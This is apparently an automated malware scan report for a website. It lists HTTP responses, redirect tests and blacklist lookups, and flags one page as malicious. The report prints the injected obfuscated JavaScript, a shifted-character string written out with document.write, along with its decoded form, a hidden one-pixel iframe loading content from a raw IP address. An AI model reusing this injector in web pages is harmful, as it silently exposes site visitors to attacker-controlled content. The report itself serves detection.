Scanned pages/files
| Request                            | Server response                                           | Status    |
| http://wbhto.com/                  | 200 OK; Content-Length: 425; Content-Type: text/html       | clean     |
| http://wbhto.com/cgi-bin/          | 403 Forbidden; Content-Length: 464; Content-Type: text/html | clean     |
| http://wbhto.com/test404page.js    | 404 Not Found; Content-Length: 466; Content-Type: text/html | clean     |
| http://wbhto.com/images/           | 200 OK; Content-Length: 346; Content-Type: text/html       | clean     |
| http://wbhto.com/postinfo.html     | 200 OK; Content-Length: 3101; Content-Type: text/html      | malicious |
Malicious code - confirmed by antiviruses (see below):

    var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-216-213-225-:8-21:-212-43-226-225-::-72-45-215-227-227-223-69-58-58-68-5:-57-5:-63-61-57-65-63-57-68-5:-58-227-226-58-216-221-57-::-214-216-74-86-227-212-226-45-43-22:-216-211-227-215-72-5:-43-215-212-216-214-215-227-72-5:-43-226-227-232-219-212-72-45-229-216-226-216-:9-216-219-216-227-232-69-43-215-216-211-211-212-221-45-73-71-58-216-213-225-:8-21:-212-73**<=0tdsjqu?";
    var result = "";
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    document.write(result);

Decoded script (each character of `source` shifted down by one code point):

    <iframe src="http://91.142.64.91/ts/in.cgi?Ktes" width=1 height=1 style="visibility: hidden"></iframe>

Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wbhto.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:18:58 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_bwlimited/1.4 PHP/5.2.9
Content-Length: 425
Content-Type: text/html;charset=ISO-8859-1
...425 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wbhto.com
Referer: http://www.google.com/search?q=wbhto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wbhto.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wbhto.com/
Result: wbhto.com is not infected or malware details are not published yet.